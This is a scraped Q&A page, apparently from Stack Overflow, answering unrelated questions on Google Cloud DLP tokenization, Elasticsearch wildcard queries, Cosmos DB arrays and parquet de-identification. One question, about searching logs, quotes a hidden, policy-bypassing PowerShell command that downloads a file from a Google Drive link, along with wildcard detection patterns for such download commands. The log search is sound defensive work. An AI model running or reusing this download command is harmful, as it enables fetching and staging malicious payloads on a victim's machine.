Google Cloud DLP tokenization of tabular data with CryptoDeterministicConfig and custom infotype - regex

I am trying to tokenize the string value (passed in the tabular format) with custom regex infotype, but having issues when I add more than one row in the table. If I pass the single row, it successfully tokenize the string_value and returns the encoded string. I'm using the python library for this.
Custom info type is currently set to any value in a string for demo purpose and wrapped key is present in cloud KMS (removed it here for security reasons).
Following is the configuration that I am using:
# Construct FPE configuration dictionary
crypto_replace_ffx_fpe_config = {
"crypto_key": {
"kms_wrapped": {
"wrapped_key": wrapped_key,
"crypto_key_name": key_name,
}
}
}
# Add surrogate type
if surrogate_type:
crypto_replace_ffx_fpe_config["surrogate_info_type"] = {
"name": surrogate_type
}
# Construct inspect configuration dictionary
inspect_config = {
#"info_types": [{"name": info_type} for info_type in info_types],
#"min_likelihood": "VERY_UNLIKELY",
"custom_info_types": [
{
"info_type": {
"name": "custom"
},
"exclusion_type": "EXCLUSION_TYPE_UNSPECIFIED",
"likelihood": "POSSIBLE",
"regex": {
"pattern": "(?:.*)"
#"pattern": ".*"
}
}
]
}
# Construct deidentify configuration dictionary
deidentify_config = {
"info_type_transformations": {
"transformations": [
{
"primitive_transformation": {
"crypto_deterministic_config": crypto_replace_ffx_fpe_config
}
}
]
}
}
item={
"table":{
"headers":[{
"name":header
} for header in data_headers
],
"rows":[
{
"values":[
{
"string_value":"asa s.com"
}
]
}, #Issue starts when the below row is added having any value in string_value
{
"values":
[
{
"string_value":"14562#gmail.com"
}
]
}
]
}
}
# Call the API
response = dlp.deidentify_content(
parent,
inspect_config=inspect_config,
deidentify_config=deidentify_config,
item=item,
)
# Print results
return response.item.table
If i am sending one row of data, getting response as
headers {
name: "token"
}
rows {
values {
string_value: "EMAIL_ADDRESS(XX):XXXXXXXXXXXXXXXXXXX="
}
}
And when i am sending item with more than one row, i am getting what i originally sent to api as it is back:
For example:
headers {
name: "token"
}
rows {
values {
string_value: "asa s.com"
}
}
rows {
values {
string_value: "14562#gmail.com"
}
}

It seems like you are using InfoTypeTransformations for DeidentifyConfig.
As per the documentation, you should use RecordTransformations instead, as this category of transformation "is applied to values within submitted tabular text data that are identified as a specific infoType, or on an entire column of tabular data" and treat the dataset as structured.

Related

ElasticSearch wildcard not returning when value has special characters

I have an elastic search service that fetches when you type into a text input to then populate a table. The search is working (returning filtered data) correctly for all alphanumeric values but not special characters (hyphens in particular). For example for the country Timor-Leste if I pass in Timor as the term I get the result but as soon as I add the hyphen (Timor-) I get an empty array response.
const queryService = {
search(tableName, field, term) {
// If there is no search term, run the wildcard search with 20 values
// for the smaller lists to be pre-populated, like "Gender"
return `
{
"size": ${term ? 200 : 20},
"query": {
"bool": {
"must": [
{
"match": {
"tablename": "${tableName}"
}
},
{
"wildcard": {
"${field}": {
"value": "${term ? `*${term.trim()}*` : '*'}",
"boost": 1.0,
"rewrite": "constant_score"
}
}
}
]
}
}
}
`;
},
};
Is there a way I can modify my wildcard request to allow hyphens? The other response I've seen on here has suggested using "analyze_wildcard": true which hasn't worked. I've also tried to manually escape by putting a \ before each hyphen with .replace.
It all boils down to Elasticsearch analyzers.
By default, all text fields will be run through the standard analyzer, e.g.:
GET _analyze/
{
"text": ["Timor-Leste"],
"analyzer": "standard"
}
This will lowercase your input, strip any special chars, and produce the tokens:
["timor", "leste"]
If you'd like to forgo this default process, add a .keyword mapping:
PUT your-index/
{
"mappings": {
"properties": {
"country": {
"type": "text",
"fields": { <---
"keyword": {
"type": "keyword"
}
}
}
}
}
}
Then reindex your docs, and when dynamically constructing the wildcard query with the newly created .keyword field, make sure the hyphen (and all other special chars) is properly escaped:
POST your-index/_search
{
"query": {
"wildcard": {
"country.keyword": {
"value": "*Timor\\-*" <---
}
}
}
}

AWS ElasticSearch Query for Keyword not getting results I expect

I have an ElasticSearch query that looks like:
{
"query": {
"constant_score": {
"filter": {
"bool": {
"should": [
{
"wildcard": {
"Message.keyword": "*System.Net.WebClient).DownloadString(*"
}
},
{
"wildcard": {
"Message.keyword": "*system.net.webclient).downloadfile(*"
}
}
]
}
}
}
}
}
And a Doc in my Index that includes:
message:Engine state is changed from None to Available. Details: NewEngineState=Available PreviousEngineState=None SequenceNumber=13 HostName=ConsoleHost HostVersion=5.1.18362.628 HostId=3dd1a50a-cc15-45e0-bf63-4456d556fb67 HostApplication=powershell.exe -command PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('https://drive.google.com/uc?export=download EngineVersion=5.1.18362.628 RunspaceId=de762b62-056c-4be1-90bf-a12cfe6fbc72
As you can see above it includes:
(New-Object System.Net.WebClient).DownloadFile('https:....
It seems like the filter here should be matching the message, but when I execute the Query through Kibana, nothing matches even though I can see the doc above inside my index through Kibana UI if I just query for *.
I think maybe this is because the query above is querying for Message.keyword? How do I get it to successfully hit the document above?
Edit:
mapping: https://pastebin.com/cWN4jF3d
Sample data: https://pastebin.com/SyErqaG8
There are two reasons for the query not returning the result:
The field name in mapping is message whereas in query you are using Message.
A field with keyword datatype index the data as it is. This means it will be case sensitive as well. The document you shared has text System.Net.WebClient).DownloadFile( where you can see that there are characters with upper case whereas the search query you expect to match "*system.net.webclient).downloadfile(*" has all lower case characters.
Therefore the query should be:
{
"query": {
"constant_score": {
"filter": {
"bool": {
"should": [
{
"wildcard": {
"message.keyword": "*System.Net.WebClient).DownloadString(*"
}
},
{
"wildcard": {
"message.keyword": "*System.Net.WebClient).DownloadFile(*"
}
}
]
}
}
}
}
}
The keyword fields are used only for exact match. You will need to match the regular fields if you only want to match a substring / subset of the string, by querying on Message instead of Message.keyword:
{
"query": {
"constant_score": {
"filter": {
"bool": {
"should": [
{
"wildcard": {
"Message": "*System.Net.WebClient).DownloadString(*"
}
},
{
"wildcard": {
"Message": "*system.net.webclient).downloadfile(*"
}
}
]
}
}
}
}
}

elasticsearch in json string (and / or )

I am new to AWS elasticsearch but need to create queries to search the follow data with different criteria.
search_metadata (json string with key/value pair) - "{\"number\":\"111\"; \"area\":\"central\"; "\code\":\"1111\"; \"type\":\"internal\"}"
category - "statement" or "bill" or "email"
datetime - "2019-05-04T00:00:00" or "2019-07-16T00:01:00"
flag - "good" or "bad"
I need to construct query to do the following
AND or OR condition in search_metadata field (JSON string) -> not sure how to do it.
along with AND condition for category, datetime range and flag. -> Do I need to use muliti-match for flag and category ?
"query": {
"bool": {
"must": [
{
"match_phrase": {
"search_metadata": "number 111" --> not sure about AND or OR with "area" and others
}
},
{
"range": {
"datetime": {
"gte": "2019-05-04T00:00:00Z",
"lte": "2019-07-16T00:01:00Z"
}
}
}
]
}
}
}

How to read parquet file from bucket (GCS) and de-identification to specific column using DLP api?

I following is my JSON Object for DLP API call to mask specific column of data on parquet file which is on a bucket on GCS. While calli dlp.deidentify_content() method i have to pass item to it, not sure how to pass parquet file, i have already mentioned parquet file path.
inspect_config = {
'info_types': info_types,
'custom_info_types': custom_info_types,
'min_likelihood': min_likelihood,
'limits': {'max_findings_per_request': max_findings},
}
actions = [{
'saveFindings': {
'outputConfig': {
'table': {
'projectId': project,
'datasetId': 1,
'tableId': "result1"
}
}
}
}]
# Construct a storage_config containing the file's URL.
url = 'gs://{}/{}'.format(bucket, filename)
storage_config = {
'cloud_storage_options': {
'file_set': {'url': url}
}
}
# Construct deidentify configuration dictionary
deidentify_config = {
"recordTransformations": {
"fieldTransformations": [
{
"fields": [
{
"name": "IP-address"
}
],
"primitiveTransformation": {
"cryptoHashConfig": {
"cryptoKey": {
"transient": {
"name": "[TRANSIENT-CRYPTO-KEY-1]"
}
}
}
}
},
{
"fields": [
{
"name": "comments"
}
],
"infoTypeTransformations": {
"transformations": [
{
"infoTypes": [
{
"name": "PHONE_NUMBER"
},
{
"name": "EMAIL_ADDRESS"
},
{
"name": "IP_ADDRESS"
}
],
"primitiveTransformation": {
"cryptoHashConfig": {
"cryptoKey": {
"transient": {
"name": "[TRANSIENT-CRYPTO-KEY-2]"
}
}
}
}
}
]
}
}
]
}
}
# Call the API
response = dlp.deidentify_content(
parent, inspect_config=inspect_config,
deidentify_config=deidentify_config, item=item)
What i am trying to accomplish is to mask parquet file which is on GCS bucket and mask few column and the stored the masked parquet file as table on BigQuery table.
Parquet files are currently scanned as binary objects, as the system does not parse them smartly yet. In the V2 api the supported file types are listed here
What you can do is load your parquet file from a bucket into bigquery as documented in this guide and then parse the data from bigquery with DLP API

Azure Cosmos query to convert into List

This is my JSON data, which is stored into cosmos db
{
"id": "e064a694-8e1e-4660-a3ef-6b894e9414f7",
"Name": "Name",
"keyData": {
"Keys": [
"Government",
"Training",
"support"
]
}
}
Now I want to write a query to eliminate the keyData and get only the Keys (like below)
{
"userid": "e064a694-8e1e-4660-a3ef-6b894e9414f7",
"Name": "Name",
"Keys" :[
"Government",
"Training",
"support"
]
}
So far I tried the query like
SELECT c.id,k.Keys FROM c
JOIN k in c.keyPhraseBatchResult
Which is not working.
Update 1:
After trying with the Sajeetharan now I can able to get the result, but the issue it producing another JSON inside the Array.
Like
{
"id": "ee885fdc-9951-40e2-b1e7-8564003cd554",
"keys": [
{
"serving": "Government"
},
{
"serving": "Training"
},
{
"serving": "support"
}
]
}
Is there is any way that extracts only the Array without having key value pari again?
{
"userid": "e064a694-8e1e-4660-a3ef-6b894e9414f7",
"Name": "Name",
"Keys" :[
"Government",
"Training",
"support"
]
}
You could try this one,
SELECT C.id, ARRAY(SELECT VALUE serving FROM serving IN C.keyData.Keys) AS Keys FROM C
Please use cosmos db stored procedure to implement your desired format based on the #Sajeetharan's sql.
function sample() {
var collection = getContext().getCollection();
var isAccepted = collection.queryDocuments(
collection.getSelfLink(),
'SELECT C.id,ARRAY(SELECT serving FROM serving IN C.keyData.Keys) AS keys FROM C',
function (err, feed, options) {
if (err) throw err;
if (!feed || !feed.length) {
var response = getContext().getResponse();
response.setBody('no docs found');
}
else {
var response = getContext().getResponse();
var map = {};
for(var i=0;i<feed.length;i++){
var keyArray = feed[i].keys;
var array = [];
for(var j=0;j<keyArray.length;j++){
array.push(keyArray[j].serving)
}
feed[i].keys = array;
}
response.setBody(feed);
}
});
if (!isAccepted) throw new Error('The query was not accepted by the server.');
}
Output: